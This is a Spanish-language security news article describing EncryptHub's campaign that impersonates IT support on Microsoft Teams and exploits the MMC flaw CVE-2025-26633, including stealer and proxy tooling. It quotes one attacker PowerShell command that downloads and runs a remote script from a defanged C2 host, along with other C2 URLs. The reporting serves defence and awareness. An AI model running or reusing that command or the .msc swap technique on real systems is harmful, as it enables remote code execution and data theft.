Red Hot Cyber
La ciberseguridad se comparte. Reconozca el riesgo, combátalo, comparta sus experiencias y anime a otros a hacerlo mejor que usted.
Buscar
Banner Ancharia Mobile 1
Banner Ancharia Desktop 1 1
¿Respondiste al soporte de TI en Teams? ¡Felicitaciones! El troyano está en tu PC con permisos que exceden los tuyos.

¿Respondiste al soporte de TI en Teams? ¡Felicitaciones! El troyano está en tu PC con permisos que exceden los tuyos.

Redazione RHC : 15 agosto 2025 14:42

El equipo de investigación de Trustwave SpiderLabs ha identificado una nueva ola de ataques a EncryptHub que combinan errores humanos y la explotación de una vulnerabilidad en la Consola de Administración de Microsoft. Los operadores se hacen pasar por personal de soporte técnico, los contactan a través de Microsoft Teams y luego convencen al «cliente» de que abra el acceso remoto y ejecute una serie de comandos, antes de desplegar la carga útil para el error CVE-2025-26633, conocido como MSC EvilTwin.

Al mismo tiempo, el grupo utiliza canales de distribución no estándar, incluyendo la plataforma de soporte Brave, lo que dificulta el filtrado de tráfico y el análisis de incidentes. Los informes también mencionan otros nombres del mismo equipo: LARVA-208 y Water Gamayun; Anteriormente, el grupo había sido asociado con ataques contra desarrolladores de Web3 y el abuso de la plataforma Steam, y hasta febrero, 618 organizaciones en todo el mundo se habían visto comprometidas.

El primer paso es la ingeniería social. La víctima recibe una solicitud de Teams de un «informático», tras lo cual el contacto insistentemente ofrece iniciar una sesión remota y «revisar la configuración«. Una vez establecida la sesión, se ejecuta una línea como esta en la máquina:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command «Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression»

Esta llamada descarga y ejecuta el script runner.ps1, que proporciona una plataforma para explotar la vulnerabilidad. MMC.

Luego viene el truco con los archivos .msc duplicados. El cargador crea dos archivos de consola con el mismo nombre: una copia limpia se coloca en el directorio esperado y una copia maliciosa se coloca en la ruta MUIPath, generalmente el directorio en-US. Al iniciar el complemento legítimo, aparece el proceso mmc.exe y, debido al error de EvilTwin MSC, primero busca el archivo con el mismo nombre en MUIPath. Como resultado, el sistema detecta el archivo «mirror» de en-US y ejecuta el código de los atacantes. Aunque la falla se describió públicamente como un día cero en marzo de 2025, se encontraron muestras de dichos archivos en ataques activos desde febrero. Hay un parche, pero la recepción sigue funcionando en estaciones sin parche.

Tras eliminar los duplicados, runner.ps1 modifica el contenido del complemento malicioso: el marcador de posición htmlLoaderUrl se reemplaza con la dirección del nodo de comando y control de EncryptHub, una cadena como hxxps://cjhsbam[.]com/payload/build[.]ps1. Tras recibir el enlace, .msc ejecuta el siguiente paso.

El script build.ps1 recopila los «dedos» del sistema y los envía a C2, registra el mecanismo de ejecución automática, gestiona el canal de comunicación y espera a que se ejecute la tarea. Los comandos se reciben cifrados (AES), se descifran localmente y se ejecutan directamente en el nodo mediante Invoke-Expression. Entre los módulos típicos se incluye el ladrón PowerShell Fickle Stealer, que extrae archivos confidenciales, información del entorno y datos de la billetera de criptomonedas.

Durante la investigación, surgieron herramientas Go adicionales con las que los operadores están reemplazando gradualmente los scripts de PowerShell. Una de ellas, SilentCrystal, replica la lógica del gestor de arranque, pero está comprimida en un binario nativo. Primero, se crea una carpeta pseudo-sistema «C:WindowsSystem32» con un espacio después de la palabra «Windows», lo que copia visualmente el directorio real y confunde a las herramientas de seguridad. A continuación, la muestra envía un POST al servidor de control con una clave API codificada y un nombre de archivo aleatorio con extensión .zip; en respuesta, se envía un enlace legítimo al soporte de Brave.

Los usuarios novatos no pueden subir archivos adjuntos a este sitio, lo que significa que EncryptHub tiene una cuenta con permisos de carga. El archivo del soporte de Brave se descarga y descomprime, tras lo cual el marcador {URI} en WF.msc se reemplaza con la dirección del centro de comando. A continuación, se lanza el archivo .msc estándar y, gracias a CVE-2025-26633, la consola detecta la sustitución del directorio «false» y ejecuta el código solicitado.

Otro descubrimiento interesante es un «proxy de marcadores» en Go compatible con SOCKS5. Sin parámetros, se inicia como cliente, se conecta al alojamiento de los atacantes utilizando los detalles codificados en el binario y desvía el tráfico a través de un túnel. También hay un modo servidor: se carga un archivo con datos de autenticación, se genera automáticamente un certificado TLS autofirmado (el campo Nombre Común contiene la línea de Calcetines Inversos y el nombre DNS es localhost), tras lo cual el proceso comienza a aceptar múltiples conexiones, paralelizando el procesamiento mediante goroutines. Cuando se establece una conexión, el agente inicia sesión en Telegram con el estado «inicio», donde sustituye el nombre de usuario, el dominio de la variable de entorno USERDOMAIN, el resultado de la verificación de los derechos administrativos mediante una llamada de sesión de red, así como la IP pública, la geoetiqueta y el proveedor tras la solicitud a https://ipinfo.io/json. El análisis de la infraestructura reveló solicitudes de carga útil a hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, otro componente del framework C2.

Immagine del sitoRedazione
Red Hot Cyber's editorial team consists of a collection of individuals and anonymous sources who actively collaborate by providing advance information and news on cyber security and IT in general.

Lista degli articoli

Artículos destacados

Immagine del sito
¡ChatGPT me da dinero! Atlas, el navegador inteligente para macOS, ya está aquí.
Di Redazione RHC - 22/10/2025

OpenAI ha lanzado el navegador ChatGPT Atlas para macOS. Integra inteligencia artificial directamente en la interfaz y permite realizar tareas en páginas web sin tener que cambiar de pestaña. Atlas ...

Immagine del sito
HackerHood de RHC revela dos nuevos días cero en productos Zyxel
Di Redazione RHC - 21/10/2025

El investigador de seguridad Alessandro Sgreccia , miembro del equipo HackerHood de Red Hot Cyber, ha informado de dos nuevas vulnerabilidades en Zyxel que afectan a varios dispositivos de la familia ...

Immagine del sito
Vulnerabilidad F5 BIG-IP: ¡266.000 dispositivos en riesgo en todo el mundo! 2.500 en Italia
Di Redazione RHC - 20/10/2025

La Agencia de Seguridad Cibernética y de Infraestructura (CISA) y el Centro de Análisis e Intercambio de Información Multiestatal (MS-ISAC) están emitiendo este Aviso Conjunto de Ciberseguridad (C...

Immagine del sito
El procesador Intel 386 cumple 40 años: comienza la era de los 32 bits
Di Redazione RHC - 20/10/2025

El 20 de octubre de 2025 marca un aniversario significativo en la historia de la informática: el procesador Intel 80386 , también conocido como i386 , celebra su 40.º aniversario . ¡Y es un cumple...

Immagine del sito
Intel lanza parches urgentes para la nueva variante de Spectre
Di Redazione RHC - 19/10/2025

Investigadores de VUSec han presentado un artículo titulado «Entrenamiento en solitario», que cuestiona los principios fundamentales de la protección contra ataques Spectre-v2 . Anteriormente , se...